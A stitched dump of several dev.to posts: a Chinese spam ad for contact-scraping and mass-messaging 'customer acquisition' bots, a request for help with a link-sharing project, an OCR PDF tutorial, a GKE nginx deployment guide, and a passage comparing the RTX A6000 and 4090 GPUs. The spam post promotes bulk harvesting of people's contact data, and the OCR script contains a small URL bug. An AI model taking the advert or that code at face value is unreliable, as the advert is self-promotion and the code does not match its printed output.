全球获客活粉采集软件,获客群发工具,获客霸屏机器人 了解相关软件请登录 http://www.vst.tw...
0
2024-07-12T23:24:53
https://dev.to/qmmc_sqru_40a68d5c587d92e/huo-ke-ba-ping-ji-qi-ren-19e2
全球获客活粉采集软件,获客群发工具,获客霸屏机器人 了解相关软件请登录 http://www.vst.tw 获客活粉采集软件是当今数字营销领域中的一种重要工具,它们为企业提供了强大的能力来吸引、获取和管理潜在客户的信息。无论是传统企业还是新兴的在线业务,都可以通过这些软件有效地扩展其客户基础和市场份额。 1. 获客活粉采集软件的定义和作用 获客活粉采集软件是指一类专门用于从互联网上收集潜在客户信息的工具。它们通过自动化或半自动化的方式,搜索并收集与企业产品或服务相关的信息,如电子邮件地址、社交媒体账号、联系电话等。这些软件不仅帮助企业建立客户数据库,还能够进行客户细分和管理,为营销和销售团队提供精准的目标群体。 2. 主要功能和特点 获客活粉采集软件的功能和特点多样,包括但不限于, 自动化数据收集, 软件能够自动从互联网上抓取并整理客户信息,减少人工操作成本和时间。 多渠道信息采集, 能够从多种渠道获取信息,包括搜索引擎、社交媒体平台、在线论坛等,以确保信息的全面性和准确性。 数据清洗和验证, 能够对采集到的数据进行清洗和验证,确保数据的质量和有效性,减少无效信息的影响。 客户分析和报告, 提供客户行为分析和报告功能,帮助企业了解客户偏好和行为习惯,优化营销策略和销售流程。 3. 应用场景和优势 获客活粉采集软件在多个行业和场景中都有广泛的应用,例如, 电商和零售业, 通过收集客户的购买历史和偏好,精准推送个性化营销活动和优惠信息。 教育和培训机构, 收集潜在学员的联系方式和兴趣爱好,定向推送课程信息和学习资源。 B2B市场, 帮助企业找到潜在的商业合作伙伴或供应商,建立长期合作关系。 获客活粉采集软件的优势在于提升了企业的市场响应速度和精准度,减少了市场营销的盲目性和浪费。通过有效的客户数据管理和分析,企业能够更好地理解市场需求,优化产品和服务,提升客户满意度和忠诚度。 4. 安全和合规性考虑 随着数据隐私和保护法规的日益严格,获客活粉采集软件在使用时需要考虑数据的安全性和合规性。合法合规的数据采集和处理流程是企业使用这类软件的重要保障,需要遵循当地和国际的相关法律法规,保护用户数据不被滥用或泄露。 结论 获客活粉采集软件作为现代营销策略中的关键工具,为企业在竞争激烈的市场环境中获取和维护客户提供了重要支持。它们的功能多样性和智能化特点,使其成为企业数字化转型过程中不可或缺的一部分,帮助企业实现市场扩展和业务增长的战略目标。 了解相关软件请登录 http://www.vst.tw Tag:获客营销机器人,获客营销软件,获客引流软件,获客获取软件,获客加粉软件,获客群控机器人,获客群控软件,获客群控群控,获客群控专家,获客群控大师机器人,获客群控推广软件,获客群控引流工具,获客营销大师,获客推广专家
qmmc_sqru_40a68d5c587d92e
1,920,804
A New Open Source Platform for people to share their links of Favorite content over the internet
I have Created an open source Platform where a user can share the links of their favorite content...
0
2024-07-13T07:08:57
https://dev.to/emdadr/a-new-open-source-platform-for-people-to-share-their-links-of-favorite-content-over-the-internet-1hm2
webdev, opensource, dotnet, csharp
I have Created an open source Platform where a user can share the links of their favorite content over like (Insat reels, TikTok, Youtube vids, Facebook posts, Twitter/X Tweet/Post, Sub-Reddits, anything) ![homne page](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xxtjbq0ghkazj33suoh9.png) ------------------------------------------------------------------ on it you can create an account and post your favorite content's link ![sign up](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0mjwxnzjenhp1otesbdq.png) ------------------------------------------------------------------ (this one the upload page where user share the link 👇) ![Upload](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/old1bb5it09gczdzu6r4.png) ------------------------------------------------------------------ You can follow and unfollow people and can see the public post of your following ![follow peole](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/umzegz0wuvfi71bmqgnn.png) ------------------------------------------------------------------ you can have your post to be public or private ![pub pri](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fti8fjh7hl6kf59k6d2v.png) there is also a an explore page where users get see all the public post around the world . There is much more to know but i would like you see it yourself it would be nice. ------------------------------------------------------------------ But the only problem is that it is still incomplete i have worked on all the core features but i am struggling with UI or Frontend as you might see i am more fond of Backend . That's why i need some help with the Frontend if anyone is welling to work on it i will be grateful. i am using ASP.NET Core MVC for this project and Tailwind CSS on frontend this is a community own project and it will be always and when it is almost complete we can host it and let people enjoy . ------------------------------------------------------------------ Thank You ❤️ ------------------------------------------------------------------ GitHub Repo 👇 {% embed https://github.com/Imdad-Rind/LinkStroage %} if you make any change please make a PR ------------------------------------------------------------------
emdadr
1,920,805
Mastering Text Extraction from Multi-Page PDFs Using OCR API: A Step-by-Step Guide
Introduction Optical Character Recognition (OCR) technology has transformed the way we...
0
2024-07-15T10:58:50
https://dev.to/api4ai/mastering-text-extraction-from-multi-page-pdfs-using-ocr-api-a-step-by-step-guide-amm
ocr, textrecognition, pdf, ai
#Introduction Optical Character Recognition (OCR) technology has transformed the way we manage and process documents. OCR enables computers to convert various types of documents, such as scanned paper documents, PDF files, or images taken by a digital camera, into editable and searchable data. By identifying the text within these documents, OCR facilitates the digitization and management of information. Extracting text from multi-page PDFs is crucial in numerous industries and applications. Whether it's for archiving legal documents, processing medical records, or managing financial statements, the capability to accurately and efficiently extract text from PDFs can significantly enhance productivity and data accessibility. Multi-page PDFs often contain extensive information spread across many pages, making manual data extraction laborious and error-prone. OCR technology streamlines this process, ensuring that text is extracted quickly and with high precision. In this tutorial, we will walk you through the comprehensive process of extracting text from multi-page PDFs using the [API4AI OCR API](https://api4.ai/apis/ocr. We will begin with an overview of OCR and its applications, followed by a comparison of popular OCR solutions. Next, we will prepare your environment by subscribing to the API, obtaining the necessary API key, and making a basic API call. Finally, we will explore handling multi-page PDFs, providing example code to iterate through pages and extract text efficiently. By the end of this tutorial, you will have a thorough understanding of how to utilize OCR technology to optimize your document processing tasks. #Understanding OCR and Its Applications ## Definition and Brief History of OCR Optical Character Recognition (OCR) is a technology that transforms various types of documents, such as scanned paper documents, PDF files, or images taken with a digital camera, into editable and searchable data. OCR operates by examining the shapes of characters within a document and converting them into machine-readable text. This process allows computers to interpret and process text that previously required manual transcription. The origins of OCR date back to the early 20th century, with initial attempts to develop machines capable of reading text. However, substantial progress in OCR technology occurred during the 1970s and 1980s, thanks to the creation of more advanced algorithms and the emergence of digital imaging. The advent of personal computers further boosted the adoption of OCR, making it available to a broader audience and a variety of applications. Today, OCR technology continues to advance, incorporating artificial intelligence and machine learning to achieve greater accuracy and flexibility. ## Applications of OCR in Various Industries OCR technology is utilized across numerous industries, each benefiting from its capacity to enhance document processing and data management: - **Legal**: In the legal field, OCR is employed to digitize and organize large volumes of legal documents, contracts, and case files. This enables rapid information retrieval, efficient document searching, and reduced need for physical storage. - **Healthcare**: Medical providers use OCR to transform patient records, medical forms, and prescriptions into digital formats. This improves patient care by ensuring that medical information is readily accessible and can be securely shared among healthcare professionals. - **Finance**: Financial institutions apply OCR to process invoices, receipts, and financial statements. OCR facilitates automated data entry, minimizes manual errors, and accelerates financial transactions and reporting. - **Education**: Schools and universities use OCR to digitize textbooks, research papers, and historical documents. This enhances the accessibility and searchability of educational materials, aiding in research and learning. - **Retail**: In the retail sector, OCR is used for inventory management, processing customer feedback forms, and extracting data from receipts for loyalty programs. ## Advantages of Using OCR for Text Extraction from PDFs Utilizing OCR for extracting text from PDFs provides numerous benefits: - **Efficiency**: OCR automates the text extraction process, significantly cutting down the time and effort needed for manual transcription. This is particularly advantageous for handling multi-page PDFs that contain substantial amounts of data. - **Accuracy**: Modern OCR technologies, driven by advanced algorithms and machine learning, offer high accuracy in text recognition. This ensures the extracted text is dependable, minimizing the need for extensive manual corrections. - **Searchability**: By converting scanned documents and images into searchable text, OCR enhances the ability to quickly find specific information within a PDF. This is especially valuable for legal and academic research, where swift access to relevant data is critical. - **Data Accessibility**: Digitizing documents with OCR makes information more accessible and easier to share. This is crucial for industries like healthcare, where rapid access to patient records can enhance the quality of care. - **Cost Savings**: Automating text extraction with OCR reduces expenses associated with manual data entry and physical document storage. Organizations can allocate resources more efficiently and focus on higher-value tasks. In this tutorial, we will harness the power of OCR technology using the [API4AI OCR API](https://api4.ai/apis/ocr) to extract text from multi-page PDFs. This will demonstrate how you can leverage OCR to enhance your document processing workflows and unlock the full potential of your digital data. #Overview of Existing OCR Solutions ## Comparison of Leading OCR APIs Several widely-used OCR APIs are available, each offering unique features and advantages. In this section, we will compare four prominent OCR APIs: Google Cloud Vision OCR, Amazon Textract, Tesseract OCR, and API4AI OCR API. ![Google Cloud Vision](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/93mxcigam5abdr9pw5qv.png) **Google Cloud Vision OCR** [Google Cloud Vision OCR](https://cloud.google.com/vision/docs/ocr) is a robust and adaptable OCR service offered by Google Cloud. It delivers high accuracy in text recognition and supports numerous languages. The API can detect text in both images and PDFs, making it ideal for various applications across multiple industries. Additionally, it offers extra features such as image labeling, face detection, and landmark recognition. ![AWS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/smkrd2mb9sc9ubs9nzwt.png) **Amazon Textract** [Amazon Textract](https://aws.amazon.com/textract/) is an OCR service provided by Amazon Web Services (AWS), specifically designed to extract text and data from scanned documents and images. It not only recognizes text but also comprehends the document's structure, including tables and forms. This capability makes it especially valuable for applications requiring detailed data extraction, such as invoice processing and form digitization. ![Tesseract OCR](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gpgbsff7np5h9jixx1f5.png) **Tesseract OCR** [Tesseract OCR](https://github.com/tesseract-ocr/tesseract) is an open-source OCR engine created by Google, known for its accuracy and wide language support. It is particularly favored by developers for its flexibility and the absence of licensing fees, allowing it to be integrated into various applications. However, it demands more effort to set up and utilize compared to cloud-based OCR services. ![API4AI OCR API](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xf1v9zrspesxosru7qz6.png) **API4AI OCR API** The [API4AI OCR API](https://api4.ai/apis/ocr) is a relatively new yet powerful OCR solution. It offers high accuracy in text recognition and supports several languages. API4AI emphasizes ease of integration, providing simple API endpoints that can be seamlessly incorporated into various applications. It is designed to process both images and PDFs, making it a versatile option for diverse OCR tasks. ## Key Features and Differences **Accuracy** - **Google Cloud Vision OCR**: Renowned for its exceptional accuracy and reliability in text recognition. - **Amazon Textract**: Delivers outstanding accuracy, particularly in extracting structured data from forms and tables. - **Tesseract OCR**: Offers high accuracy, especially when properly configured and trained with suitable data. - **API4AI OCR API**: Provides competitive accuracy, making it suitable for a variety of OCR applications. **Supported Languages** - **Google Cloud Vision OCR**: Supports more than 50 languages, making it highly versatile for language recognition. - **Amazon Textract**: Covers an expanding list of languages, with a focus on major global languages. - **Tesseract OCR**: Supports over 100 languages, including many that are less commonly used. - **API4AI OCR API**: Supports more than 70 languages, ensuring wide-ranging applicability. **Ease of Integration** - **Google Cloud Vision OCR**: Features extensive documentation and SDKs, simplifying integration into diverse programming environments. -** Amazon Textract**: Comes with thorough documentation and seamless integration with other AWS services, enhancing usability within the AWS ecosystem. - **Tesseract OCR**: Demands more manual setup and configuration, yet provides flexibility for developers seeking custom solutions. - **API4AI OCR API**: Emphasizes ease of use with straightforward API endpoints and clear documentation, ensuring simple integration. ## Why We Selected API4AI OCR API for This Tutorial We have chosen the API4AI OCR API for this tutorial for several compelling reasons: - **High Accuracy**: The API4AI OCR API delivers reliable and precise text recognition, which is crucial for effectively extracting text from multi-page PDFs. - **Ease of Integration**: Designed with user-friendliness in mind, the API4AI OCR API features simple and intuitive API endpoints. This facilitates easy integration into our tutorial's workflow without requiring extensive setup or configuration. - **Supported Languages**: Supporting multiple languages, the API4AI OCR API ensures that our tutorial can address a diverse audience with various language needs. - **Versatility**: Capable of handling both images and PDFs, the API4AI OCR API is a versatile choice for our tutorial, allowing us to demonstrate text extraction from different document types. By utilizing the API4AI OCR API, we aim to provide a clear and practical example of how to extract text from multi-page PDFs, highlighting the capabilities and ease of use of this robust OCR solution. #Preparing Your Environment ## Overview of API4AI OCR API The API4AI OCR API is a powerful, user-friendly OCR solution designed to extract text from images and PDFs. It provides high accuracy, supports multiple languages, and integrates easily into various applications. Accessible via simple HTTP requests, this API allows developers to implement OCR functionality without requiring extensive setup or configuration. In this tutorial, we will use the API4AI OCR API to demonstrate efficient text extraction from multi-page PDFs. We will walk you through subscribing to the full-featured version of the API on the RapidAPI platform. However, you can also test the API using the demo endpoint (as detailed in the [documentation](https://api4.ai/docs/ocr)) without subscribing to RapidAPI. If you opt for this approach, simply skip the RapidAPI subscription steps and slightly adjust the provided code samples. ## Subscribing to the API on Rapid API To use the API4AI OCR API, you need to subscribe to it via Rapid API, a marketplace offering access to thousands of APIs, including the API4AI OCR API. Follow these steps to subscribe: 1. **Create a Rapid API Account**: If you don't have an account, sign up at the [Rapid API Hub](https://rapidapi.com/hub). 2. **Search for API4AI OCR API**: Use the search bar to locate the API4AI OCR API. Alternatively, you can navigate directly to the [API4AI OCR API page](https://rapidapi.com/api4ai-api4ai-default/api/ocr43). 3. **Subscribe to the API**: On the API4AI OCR API page, choose a pricing plan that meets your requirements and subscribe to the API. Many APIs, including the API4AI OCR API, offer a free tier with limited usage, ideal for testing and development purposes. ## Obtaining Your API Key After subscribing to the API4AI OCR API, you'll need to acquire your API key to authenticate your requests. Follow these steps to obtain your API key: - **Go to Your Rapid API Dashboard**: Log in and navigate to your Rapid API [dashboard](https://rapidapi.com/developer/dashboard). - **Access the 'My Apps' Section**: Expand one of your applications and click on the 'Authorization' tab. - **Copy an Authorization Key**: You'll see a list of authorization keys. Copy one of these keys, and you’re ready to go! You now have your API4AI OCR API key. ## Making a Basic API Call With your API key ready, you can now perform a basic API call to the API4AI OCR API to verify that everything is configured properly. Execute the following command: ```bash curl -X 'POST' 'https://ocr43.p.rapidapi.com/v1/results' \ -H 'X-RapidAPI-Key: ...' -F "url=https://storage.googleapis.com/api4ai-static/samples/ocr-1.png" ``` The expected output should be: ```bash {"results":[{"status":{"code":"ok","message":"Success"},"name":"https://storage.googleapis.com/api4ai-static/samples/ocr-1.png","md5":"7009ed0064efa278ed529d382e968dcb","width":333,"height":241,"entities":[{"kind":"objects","name":"text","objects":[{"box":[0.04804804804804805,0.12863070539419086,0.8588588588588588,0.7302904564315352],"entities":[{"kind":"text","name":"text","text":"EAST NORTH\nBUSINESS\nINTERSTATE\n40 85"}]}]}]}]} ``` By completing these steps, you have successfully prepared your environment, subscribed to the API4AI OCR API, acquired your API key, and performed a basic API call. You are now equipped to tackle more advanced tasks, such as extracting text from multi-page PDFs, which we will explore in the following section. #Handling Multi-Page PDFs ## Challenges with Multi-Page PDFs Working with multi-page PDFs presents several challenges that are not encountered with single-page documents. These challenges include: - **File Size and Complexity**: Multi-page PDFs can be large and intricate, making efficient processing more difficult. Handling such files requires careful memory management and may necessitate splitting the PDF into smaller, more manageable segments. - **Consistency Across Pages**: Achieving uniform OCR accuracy across all pages can be challenging, as different pages may have varying layouts, fonts, and image quality. This requires robust preprocessing and error handling to maintain consistency. - **Combining Extracted Text**: Once text is extracted from each page, it must be combined coherently. This involves managing page breaks and ensuring the correct sequence of the text. ## Sample Code to Iterate Through Pages and Extract Text Here is a detailed guide and example code to process multi-page PDFs using the API4AI OCR API. **Parsing Command-Line Arguments** The script will accept and manage command-line arguments using the **argparse** library. The --api-key **api-key** argument represents your API key from Rapid API. Below is the implementation of the necessary function in Python. ```python def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser() parser.add_argument('--api-key', help='Rapid API key.', required=True) parser.add_argument('pdf', type=Path, help='Path to a PDF.') return parser.parse_args() ``` **Parsing PDF with OCR API** Next, we will create a function to process each page of the PDF using the API4AI OCR API. Note that for multi-page PDFs, each page will yield a separate **results** in the results field. ```python def parse_pdf(pdf_path: Path, api_key: str) -&gt; list: """ Extract text from a pdf. Returns list of strings, representing pdf pages. """ # We strongly recommend you use exponential backoff. error_statuses = (408, 409, 429, 500, 502, 503, 504) s = requests.Session() retries = Retry(backoff_factor=1.5, status_forcelist=error_statuses) s.mount('https://', HTTPAdapter(max_retries=retries)) url = f'{API_URL}/v1/results' with pdf_path.open('rb') as f: api_res = s.post(url, files={'image': f}, headers={'X-RapidAPI-Key': api_key}, timeout=20) api_res_json = api_res.json() # Handle processing failure. if (api_res.status_code != 200 or api_res_json['results'][0]['status']['code'] == 'failure'): print('Image processing failed.') sys.exit(1) # Each page is a different result. pages = [result['entities'][0]['objects'][0]['entities'][0]['text'] for result in api_res_json['results']] return pages ``` **Primary Function** The primary function will coordinate the entire workflow, from loading the PDF to extracting text from each individual page. ```python def main(): """ Script entry function. """ args = parse_args() text = parse_pdf(args.pdf, args.api_key) for i, text in enumerate(text): print(f'Text on {i + 1} page:\n{text}\n') if __name__ == '__main__': main() ``` **Full Python Script** Below is the full Python script, integrating all the previously discussed components: ```python """ Parse PDF using OCR API. Run script: `python3 main.py --api-key &lt;RAPID_API_KEY&gt; &lt;PATH_TO_PDF&gt; """ import argparse import sys from pathlib import Path import requests from requests.adapters import Retry, HTTPAdapter API_URL = 'https://ocr43.p.rapidapi.com/v1/results' def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser() parser.add_argument('--api-key', help='Rapid API key.', required=True) # Get your token at https://rapidapi.com/api4ai-api4ai-default/api/brand-recognition/pricing parser.add_argument('pdf', type=Path, help='Path to a PDF.') return parser.parse_args() def parse_pdf(pdf_path: Path, api_key: str) -&gt; list: """ Extract text from a pdf. Returns list of strings, representing pdf pages. """ # We strongly recommend you use exponential backoff. error_statuses = (408, 409, 429, 500, 502, 503, 504) s = requests.Session() retries = Retry(backoff_factor=1.5, status_forcelist=error_statuses) s.mount('https://', HTTPAdapter(max_retries=retries)) url = f'{API_URL}/v1/results' with pdf_path.open('rb') as f: api_res = s.post(url, files={'image': f}, headers={'X-RapidAPI-Key': api_key}, timeout=20) api_res_json = api_res.json() # Handle processing failure. if (api_res.status_code != 200 or api_res_json['results'][0]['status']['code'] == 'failure'): print('Image processing failed.') sys.exit(1) # Each page is a different result. pages = [result['entities'][0]['objects'][0]['entities'][0]['text'] for result in api_res_json['results']] return pages def main(): """ Script entry function. """ args = parse_args() text = parse_pdf(args.pdf, args.api_key) for i, text in enumerate(text): print(f'Text on {i + 1} page:\n{text}\n') if __name__ == '__main__': main() ``` **Testing the Script** Let's test the script using the following PDF file. To execute the script, run: **python3 main.py --api-key YOUR_API_KEY path/to/pdf**. The expected output should be: ```bash Text on 0 page: A Simple PDF File This is a small demonstration .pdf file - just for use in the Virtual Mechanics tutorials. More text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. Boring, zzzzz. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. Even more. Continued on page 2 ... Text on 1 page: Simple PDF File 2 ...continued from page 1. Y et more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. Oh, how boring typing this stuff. But not as boring as watching paint dry. And more text. And more text. And more text. And more text. Boring. More, a little more text. The end, and just as well. ``` By following these steps, you can efficiently manage multi-page PDFs and extract text using the API4AI OCR API. This approach enables you to handle large and intricate PDF documents effectively, harnessing the capabilities of OCR technology. ## Advanced Topics and Additional Features Real-world applications may involve additional requirements, including (but not limited to): - **Handling PDFs with Complex Layouts**: PDFs often contain intricate layouts, such as tables, images, and columns, which can challenge OCR processes. -** Using OCR for Specific Languages and Character Sets**: For OCR to work effectively with specific languages, you might need to configure the API to recognize the target language. This enhances accuracy, particularly for languages with unique characters or writing styles. - **Batch Processing Multiple PDFs**: Processing several PDFs in a batch can save time and increase efficiency. - **Storing and Managing Extracted Text Data**: After extracting text from PDFs, an efficient method for storing and managing the data is essential. If you have any questions or encounter issues, please feel free to [reach out to us directly](https://api4.ai/get-started). #Conclusion In this tutorial, we've outlined the crucial steps and considerations for extracting text from multi-page PDFs using the API4AI OCR API. Here's a quick summary of the key points: - **Understanding OCR and Its Applications**: We began with a brief history of OCR technology, examined its applications in various industries, and discussed the benefits of using OCR for text extraction from PDFs. - **Overview of Existing OCR Solutions**: We compared popular OCR APIs, including Google Cloud Vision OCR, Amazon Textract, Tesseract OCR, and API4AI OCR API, focusing on their main features and differences, and explained why we chose API4AI OCR API for this tutorial. - **Preparing Your Environment**: We walked through the steps to subscribe to the API4AI OCR API on Rapid API, obtain your API key, and make a basic API call to confirm proper setup. - **Handling Multi-Page PDFs**: We explored the challenges of working with multi-page PDFs and provided example code for iterating through pages and extracting text. This included parsing command-line arguments, processing each page of the PDF, and combining the extracted text into a coherent output. ## Final Tips and Best Practices for Using OCR APIs - **Select the Appropriate OCR API**: Choose an OCR API that meets your requirements in terms of accuracy, language support, ease of integration, and cost. The API4AI OCR API is a great option due to its balance of accuracy and user-friendliness. - **Implement Robust Error Handling**: Ensure your scripts can handle API call failures, network issues, and unexpected document formats gracefully by incorporating solid error handling mechanisms. - **Optimize for Performance**: When processing large multi-page PDFs or handling multiple files in batches, optimize your code for performance. This may include techniques such as parallel processing or efficient memory management. - **Protect Your API Keys**: Keep your API keys secure and avoid hardcoding them in your scripts. Use environment variables or secure vaults to store sensitive information safely. ## Encouragement to Explore Further and Experiment with OCR Projects The field of OCR presents limitless opportunities for innovation and efficiency. We encourage you to delve deeper and experiment with OCR projects tailored to your unique requirements. Whether you're automating document processing in a business setting, digitizing historical records for research, or creating accessible digital content, OCR technology can greatly enhance your workflows. Feel free to explore advanced features, such as handling complex document layouts, utilizing OCR for various languages and character sets, and integrating OCR with other AI and machine learning technologies. The more you experiment, the more you'll uncover the transformative potential of OCR. Thank you for following this tutorial. We hope it has provided you with a strong foundation to start extracting text from multi-page PDFs using the API4AI OCR API. Happy coding and best of luck with your OCR projects! [More stories about Cloud, AI and APIs for Image Processing](https://api4.ai/blog)
taranamurtuzova
1,920,821
Practicing with Google Cloud Platform - Google Kubernetes Engine to deploy nginx
Introduction This article provides simple step-by-step instructions for those who are new...
28,047
2024-07-17T03:00:00
https://howtodevez.blogspot.com/2024/04/practicing-with-google-cloud-platform-google-kubernetes-engine-to-deploy-nginx.html
kubernetes, gcp, beginners, devops
Introduction ------------ This article provides simple step-by-step instructions for those who are new to **Google Cloud Platform (GCP)** and **Google Kubernetes Engine (GKE)**. I'll guide you through using **GKE** to create clusters and deploy **nginx**. The instructions below will primarily use **gcloud** and **kubectl** to initialize the cluster, which is more convenient than manual management on the **Google Cloud** interface. ![Google Cloud Kubernetes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6xhbp3xcgwfqnp8dw6z2.png) Prerequisites ------------- First, you need to prepare the following: * Have a **GCP** account with permission to use Cloud services. If you're new, you'll get a **$300 free trial** to use for **90 days**. * Create a new **GCP** project. * Enable **Compute Engine** and **Kubernetes Engine** services. Install Google Cloud SDK and kubectl ------------------------------------ For this installation step, refer to the [**GCP** documentation](https://cloud.google.com/sdk/docs/install#installation_instructions) for instructions tailored to your operating system. Once installed, execute the following commands to check if **gcloud** and **kubectl** are installed: ```sh gcloud version kubectl version ``` If you see the version result, we'll proceed to the next part. ![gcloud version](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/egwqupuq3ttsdzij6bnv.png) Initialize **Google Cloud SDK** authentication ---------------------------------------------- Please execute the following command to configure **Google Cloud**: ```sh gcloud init ``` Next, you'll follow the instructions to log in with your **Google Cloud** account. Then, you'll be prompted to configure the default **Compute Region and Zone**. It's important to note that different regions have different pricing for machine types. You can check the prices on the Create VM instance UI. However, you should still choose the region that best suits your needs to ensure the best network speed. ![Google Cloud Console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o13xna17kxb3as07m2tp.png) Creating GKE Cluster -------------------- To create a **GKE Cluster**, simply execute the following command: ```sh gcloud container clusters create {cluster name} gcloud container clusters create k8s-cluster ``` If you want to specify specific details for the cluster, use the following command: ```sh # gcloud container clusters create {cluster name} \ # --project {project id} \ # --zone {zone id} \ # --machine-type {machine type id} \ # --num-nodes {number of node} gcloud container clusters create k8s-cluster \ --project cluster-1 \ --zone asia-southeast1-a \ --machine-type e2-micro \ --num-nodes 1 ``` Here, I'm using the machine type **e2-micro**, which has a simple configuration and a relatively cheap price, sufficient for you to follow along with this article. After successfully initializing the cluster, execute the following command to list the instances currently available: ```sh gcloud compute instances list ``` Use kubectl to deploy nginx --------------------------- Execute the following command to deploy **nginx** using a **Docker image**: ```sh # kubectl create deployment {service name} --image={image name} --replicas={number} kubectl create deployment service-name --image=nginx --replicas=1 ``` ![Deploy service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f4dm2w9ssnrhv07yqo0w.png) To check the pods currently available, execute the following command: ```sh kubectl get pods ``` Next, I'll create a **LoadBalancer Service** to access the **Pod** from outside the **Cluster** as follows: ```sh # kubectl expose deployment {service name} --name={load balance service name} --type=LoadBalancer --port={port load balancer service} --target-port={port pod} kubectl expose deployment service-name --name=service-name-lb --type=LoadBalancer --port=80 --target-port=80 ``` ![Expose service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f7v4tau4e3cdjna3qh0i.png) To check the **LoadBalancer service**, use the following command: ```sh kubectl get svc # or kubectl get svc service-name-lb ``` ![Service info](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0bwbsjggo9rwitwf0icf.png) If you run this command too early, the **EXTERNAL-IP** column will be **\<pending\>**. Please wait a few minutes until you see an IP address in the **EXTERNAL-IP** column to access it. The result will be as follows: ![Nginx has been successfully deployed](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/504pmlrshr9onf4pydx1.png) Cleaning Up Resources --------------------- After completing the steps outlined in the article to avoid any unwanted costs, delete the resources and services as follows: ```sh # remove LoadBalancer service kubectl delete service service-name-lb # remove GKE cluster gcloud container clusters delete k8s-cluster ``` ![Result after deleted service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6fwjjplgp8o5hq8ismap.png) To check if the resources and services have been deleted, you can use the commands I provided earlier or directly check on the **Google Cloud Console**. ```sh kubectl get svc gcloud compute instances list ``` **_If you have any suggestions or questions regarding the content of the article, please don't hesitate to leave a comment below!_** **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/practicing-with-google-cloud-platform-google-kubernetes-engine-to-deploy-nginx.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,920,845
RTX A6000 vs RTX 4090: Which GPU Is Right for You?
Introduction Nvidia leads with its RTX series, featuring the top-notch GPUs RTX A6000 and...
0
2024-07-12T21:30:00
https://blogs.novita.ai/rtx-a6000-vs-rtx-4090-which-gpu-is-right-for-you/
webdev, gpu
## **Introduction** Nvidia leads with its RTX series, featuring the top-notch GPUs RTX A6000 and RTX 4090 for professionals and gamers. Today, the blog will break down their features, performance, design, and energy efficiency to help you choose the best one that may fit your needs. We will explore key features, performance comparisons, build quality, and energy efficiency to make an informed decision between the RTX A6000 and RTX 4090. Let’s dive in! ## **Overview of RTX A6000 and RTX 4090** The RTX A6000 and RTX 4090 are top-notch Nvidia graphics cards designed for different purposes. The RTX A6000 is ideal for professionals in fields, just like architecture, animation, and so on, offering specialized features for heavy-duty tasks on high-end workstations. On the other hand, the RTX 4090 is featured for gaming enthusiasts, which can provide top-tier performance and stunning visuals to boost gaming experiences, even when you are during intense gameplay. Explore the unique features of each GPU — the RTX A6000 and RTX 4090 — to find the perfect match for your needs. **Key features of RTX A6000** - a powerful graphics card for engineering and media work - 48 GB memory - ideal for big tasks - the high bandwidth of 768.0 GB/s means fast data movement - handling calculations swiftly with 10752 CUDA cores - boosting rendering speed, number crunching and AI tasks - supporting ray tracing and Tensor Cores for AI jobs - connect to multiple displays easily with four DisplayPort outputs **Key features of RTX 4090** - enhancing gaming with features - 24 GB GDDR6X memory - a bandwidth of 1,008 GB/s - 16384 CUDA cores for significant computing power - high frame rates - seamless gameplay in the latest AAA game titles. - supporting DLSS for better visual quality - real-time ray tracing technology RTX 4090 ## **Performance Comparison** When it comes to their specific work, both of them are really strong in what they do. People often choose the RTX A6000 when working, because it can make graphics look real fast and help people get their jobs done quicker. But if you’re into playing video games, the RTX 4090 is your go-to because it makes sure you can play all the new games with super clear pictures and smooth movements. **Benchmarking results overview** Through the results, we can note that the RTX A6000 is not designed for gaming but rather for professional applications where rendering and computational performance tests are paramount. These benchmarking results also highlight the superior gaming performance of the RTX 4090. If you are a gamer wanting high frame rate, it is a good choice for you. **Gaming performance analysis** Regarding gaming, the RTX 4090 exactly stands out because of its strong hardware and cool features. It can handle all the new big games at high quality and fast speeds, making your game time super smooth and fun. For top games like Cyberpunk 2077, Assassin’s Creed Odyssey, and Battlefield 5, this graphics card always gives you more FPS (frames per second) than the RTX A6000 does. The reason why the RTX 4090 is so good for gaming boils down to having more CUDA cores faster memory speed , and some awesome gaming techs like DLSS and real-time ray tracing. These things make your games look amazing while running great too. ## **Design and Build Quality** The way a graphics card is made and its quality are super important for how well it works and lasts. The RTX A6000 and the RTX 4090 both have strong builds and top-notch parts, making sure they run smoothly and reliably. **Cooling technologies compared** The RTX A6000 and the RTX 4090 use different ways to keep cool, making 